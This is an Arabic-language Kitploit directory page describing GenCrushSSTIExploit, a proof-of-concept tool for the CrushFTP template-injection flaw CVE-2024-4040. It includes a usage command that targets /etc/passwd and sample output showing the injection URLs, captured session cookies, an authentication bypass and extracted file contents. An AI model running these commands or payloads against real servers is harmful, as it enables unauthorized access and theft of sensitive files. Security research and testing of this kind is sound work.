Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GenCrushSSTIExploit — هو أداة PoC لـ CVE-2024-4040 لاستغلال ثغرة SSTI في CrushFTP | Kitploit
أدوات/GitHubGitHub/geniuszly/gencrushsstiexploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

هو أداة PoC لـ CVE-2024-4040 لاستغلال ثغرة SSTI في CrushFTP

عرض المستودع
818منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

العربية

GenCrushSSTIExploit هي أداة استغلال PoC تستهدف ثغرة SSTI (حقن القوالب من جانب الخادم) في CrushFTP CVE-2024-4040. توضح هذه الأداة كيفية استغلال هذه الثغرة لأغراض تعليمية واختبار الاختراق الأخلاقي فقط.

الميزات

  • إنشاء جلسة مع خادم CrushFTP لاستخراج ملفات تعريف الارتباط للمصادقة.
  • استغلال ثغرة SSTI لحقن الحمولات.
  • محاولة تجاوز المصادقة واستخراج الملفات الحساسة من الخادم.
  • استخدام rich لإخراج وحدة تحكم جميل ومنسق.

إخلاء المسؤولية

⚠️ استخدم هذه الأداة بمسؤولية! إنها مخصصة لأغراض البحث والتعليم فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

التثبيت

المتطلبات الأساسية

  • Python 3.7+
  • pip (مدير حزم Python)

استنساخ المستودع

git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

تثبيت الحزم المطلوبة

pip install -r requirements.txt

الاستخدام

الأمر الأساسي

python GenCrushSSTIExploit.py -t <TARGET_URL>
  • -t / --target: يحدد عنوان URL المستهدف لخادم CrushFTP الضعيف.

المعلمات الاختيارية

  • -l / --lfi: تضمين الملف المحلي. يحدد الملف الذي سيتم تضمينه للاستخراج.
  • -w / --wordlist: يحدد قائمة كلمات للتجربة على مسارات الملفات.

مثال

python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

مثال على الإخراج

★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
تنزيل الأداة